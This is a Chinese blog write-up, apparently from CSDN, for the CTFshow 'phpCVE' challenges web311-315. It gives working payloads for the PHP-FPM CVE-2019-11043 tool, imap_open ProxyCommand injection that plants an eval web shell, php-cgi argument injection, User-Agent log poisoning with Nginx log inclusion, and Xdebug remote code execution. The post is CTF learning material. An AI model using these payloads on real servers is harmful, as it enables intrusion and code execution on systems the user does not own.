Phpcve

于 2024-07-26 10:13:22 发布
阅读量603 收藏 12
点赞数 27
文章标签: 网络安全 cve ctfshow ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74402888/article/details/140708056
版权

Web311

影响版本

PHP 5.6-7.x

Nginx>=0.7.31

nginx配置了fastcgi_split_path_info

漏洞利用

git clone https://github.com/neex/phuip-fpizdam.git

cd phuip-fpizdam

执行命令换代理:go env -w GOPROXY=https://goproxy.cn

执行go get -v && go build

go run . "http://xxx.xxx.xxx.xxx/index.php"

/index.php?a=tac fl0gHe1e.txt

Web312

PHP:5.6.38

系统:Debian/ubuntu

php imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。

因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。

漏洞利用

先对 shell base64 编码

<?php @eval($_POST[succ3]);?>

=> PD9waHAgQGV2YWwoJF9QT1NUW3N1Y2MzXSk7Pz4=。

再对 echo "PD9waHAgQGV2YWwoJF9QT1NUW3N1Y2MzXSk7Pz4=" | base64 -d > /var/www/html/shell.php

进行一次base64编码,ZWNobyAiUEQ5d2FIQWdRR1YyWVd3b0pGOVFUMU5VVzNOMVkyTXpYU2s3UHo0PSIgfCBiYXNlNjQgLWQgPiAvdmFyL3d3dy9odG1sL3NoZWxsLnBocA==,若有 =或者+ 需 url 编码一次。

最后将 hostname 的内容替换为 x+-oProxyCommand%3decho%09编码后的命令|base64%09-d|sh},也就是:

Payload:

x+-oProxyCommand%3decho%09ZWNobyAiUEQ5d2FIQWdRR1YyWVd3b0pGOVFUMU5VVzNOMVkyTXpYU2s3UHo0PSIgfCBiYXNlNjQgLWQgPiAvdmFyL3d3dy9odG1sL3NoZWxsLnBocA%3D%3D|base64%09-d|sh}

succ3=system('tac ctfshowfl4g');

web313

影响版本 php < 5.3.12 or php < 5.4.2

用户请求的querystring被作为了php-cgi的参数。

访问http://your-ip:8080/index.php?-s即爆出源码,说明漏洞存在。

Payload:

/index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input

<?php echo system("cat /somewhere/fla9.txt"); ?>

Web314

利用 User-Agent 把shell写入日志,然后再包含日志就可以了,又因为使用的是 Nginx 服务器,所以默认日志位置为 /var/log/nginx/access.log。

User-Agent: <?php system('cat /fl6g');?>

GET /?f=/var/log/nginx/access.log HTTP/1.1

Web315

利用前提

目标开启了远程调试模式,并设置remote_connect_back = 1:

xdebug.remote_connect_back = 1

xdebug.remote_enable = 1

在上面的配置下,我们访问http://target/index.php?XDEBUG_SESSION_START=phpstorm,目标服务器的XDebug将会连接访问者的IP(或X-Forwarded-For头指定的地址)并通过dbgp协议与其通信,我们通过dbgp中提供的eval方法即可在目标服务器上执行任意PHP代码。

指定目标web地址、待执行的php代码即可:

# 要求用python3并安装requests库

python3 exp.py -t http://127.0.0.1:8080/index.php -c 'shell_exec('id');'

环境损坏

小春学渗透
关注
  • 27
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFshow phpCVE
starttv的博客
12-05 793
CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下: 攻击者可以使用换行符(%0a)来破坏​指令中的Regexp。Regexp被损坏导致PATH_INFO为空,从而触发该漏洞。安装漏洞利用工具 在phuip-fpizdam目录下执行 go run . "htt
CTFSHOW-phpCVE Writeup
weixin_59419135的博客
11-25 1297
ctfshow phpCVE(web311,web312,web313,web314,web315) CVE-2019-11043,CVE-2018-19935,CVE-2012-1823,PHP_SESSION_UPLOAD_PROGRESS文件包含, XDebug 远程调试漏洞
CTFSHOW PHPCVE复现
snowlyzz的博客
10-03 880
PHPCVE 复现学习
CTFSHOW--PHPCVE复现
qq_49422880的博客
02-22 3276
CTFSHOW--PHPCVE复现web311[CVE-2019-11043]web312(CVE-2018-19518)web313(CVE-2018-19518)web314:(日志文件包含)web315:(XDebug 远程调试漏洞) web311[CVE-2019-11043] web312(CVE-2018-19518) 同样,没有任何的界面就直接抓包,发现是X-Powered-By: PHP/5.6.38,网上搜索发现是CVE-2018-19518 PHP imap 远程命令执行漏洞。 简介:
ctfshow-phpCVE
njh18790816639的博客
04-20 640
前言 首先要安装go语言!这个需要配置好,有点难配置!此时我们下载phuip-fpizdam这个工具! web311 这里就要用到了phuip-fpizdam这个工具了! 然后再用index.php?a的命令去执行! web312(CVE-2018-19518) PHP 的imap_open函数中的漏洞可能允许经过身份验证的远程攻击者在目标系统上执行任意命令。该漏洞的存在是因为受影响的软件的imap_open函数在将邮箱名称传递给rsh或ssh命令之前不正确地过滤邮箱名称。如果启用了rsh和ssh功
ctfshow-phpcve
qq_45951598的博客
10-04 155
web312(CVE-2018-19518)-PHP-IMAP php imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。 因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。 影响: PHP:5.6.38 系统:Debian/ubuntu
ctfshow phpCVE web311~315
shinygod的博客
10-07 676
php imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。
ctfshow web入门(phpcve)
qq_53263789的博客
07-19 715
ctfshow
ctfshow phpCVE web311-web315 wp
mumuzi的博客
02-04 1843
ctfshow-php-CVE-wp----------
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8348
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
性能~问题业务场景稳定性测试
07-25
1
《AI大模型应用》--百度AI 文心一言.zip
07-25
个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸! 个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸! 个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸! 个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸! 个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸! 个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸!
b112日常办公用品直售推荐系统-springboot+vue.zip(可运行源码+sql文件+)
07-25
日常办公用品直售推荐系统是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 日常办公用品直售推荐系统是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 日常办公用品直售推荐系统是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 日常办公用品直售推荐系统是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 日常办公用品直售推荐系统是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 日常办公用品直售推荐系统是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 日常办公用品直售推荐系统是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。
Android个性化书架应用构建.rar
07-25
Android个性化书架应用构建
b120房屋租赁管理系统-springboot+vue+elementui.zip(可运行源码+sql文件+文档)
07-25
房屋租赁管理系统管理系统按照操作主体分为管理员和用户。管理员的功能包括报修管理、字典管理、租房房源管理、租房评价管理、房源租赁管理、租房预约管理、论坛管理、公告管理、投诉建议管理、用户管理、租房合同管理、管理员管理。用户的功能等。该系统采用了Mysql数据库,Java语言,Spring Boot框架等技术进行编程实现。 房屋租赁管理系统管理系统可以提高房屋租赁管理系统信息管理问题的解决效率,优化房屋租赁管理系统信息处理流程,保证房屋租赁管理系统信息数据的安全,它是一个非常可靠,非常安全的应用程序。 管理员权限操作的功能包括管理公告,管理房屋租赁管理系统信息,包括房源管理,报修管理,报修管理,公告管理等,可以管理投诉建议。 房源管理界面,管理员在房源管理界面中可以对界面中显示,可以对房源信息的房源状态进行查看,可以添加新的房源信息等。报修管理界面,管理员在报修管理界面中查看,新增报修信息等。投诉建议管理界面,管理员在投诉建议管理界面中新增投诉建议,可以删除投诉建议。公告管理界面,管理员在公告管理界面查看公告的工作状态,可以对公告的数据进行导出,可以添加新公告的信息,可以编辑公告信息,删除公告信息。
开题报告创权法律服务系统 已通过开题答辩的.doc
07-25
进入20世纪80年代,我国加快了改革开放的步伐,市场经济体制已逐步形成,我国的经济发展受世人所瞩目,但法律法规的置后,使经济发展不规范问题暴露的相当严重,特别是社会整体信用的缺失,使消费环境不断恶化。而如今随着城镇化的高速推进,精神追求远不及物质发展迅速,维权问题也越来越成为人们十分关注的社会话题。 维权是指维护个人或群体的合法权益,范围包括人身损害、土地纠纷、 医疗事故、婚姻、家庭、继承等民事纠纷所进行的行政及司法诉讼。维护消费者合法权益关系着全社会每个人的利益,群众利益无小事。维护消费者合法权益正体现着“权为民所用,利为民所谋”。而现如今由于法律规则的不完善加上自身对法律知识的不了解,导致很多公民的权益问题在复杂的社会情况下无法得到妥善的解决,使得公民的财产和心理受到难以弥补的损失,严重威胁到社会的安全与稳定,公民之间的诚信与统一。因此更便捷、迅速地维护公民的合法权益,已经成为了一个刻不容缓去解决的社会问题。
开题报告大数据统计分析的气候可视化系统 已通过开题答辩的.docx
07-25
互联网的不断发展建设,数据时代的到来,人们对各类数据的挖掘、统计的需求越来越大,爬虫技术的成熟,为人们提供了极大的便利,通过爬虫技术可快速挖掘、统计人们所需数据。 随着计算机技术的发展,天气数据信息化已经成为时代发展必然,天气数据变幻莫测,天气数据每时每刻都在变化,面对大量的天气数据,导致现有的天气数据信息系统已经不能满足大量天气数据挖掘分析的应用需求,因此,人们开始结合天气数据相关特点,进天气数据挖掘方面的研究。只有将天气数据、大数据平台和分析技术很好的耦合,才能为用户提供及时的天气信息,才能更好的分析天气情况。因此,针对天气数据挖掘和分析方面,建立一个大数据统计分析的气候可视化系统是必须的,系统的应用可将天气数据可视化,全面分析,更好的为用户服务。
基于java开发的电子发票识别解析工具,批量重命名,导出表格+源码+项目文档(毕业设计&课程设计&项目开发)
最新发布
07-25
基于java开发的电子发票识别解析工具,批量重命名,导出表格+源码+项目文档,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用~ 基于java开发的电子发票识别解析工具,批量重命名,导出表格+源码+项目文档,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用~ 基于java开发的电子发票识别解析工具,批量重命名,导出表格+源码+项目文档,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用~ 基于java开发的电子发票识别解析工具,批量重命名,导出表格+源码+项目文档,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用~ 项目简介: 电子发票识别工具,批量重命名发票,导出发票信息表格 功能 批量重命名发票文件 导出excel
ctfshow phpcve
09-10
你好!关于 CTFShow 的 PHP 漏洞,我可以提供一些常见的 PHP 漏洞类型,但无法提供具体的 CTFShow 的漏洞详情。一些常见的 PHP 漏洞类型包括代码注入、文件包含、SQL 注入、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)等。如果你有关于某个具体漏洞的问题,请提供更多的细节,我将尽力提供帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值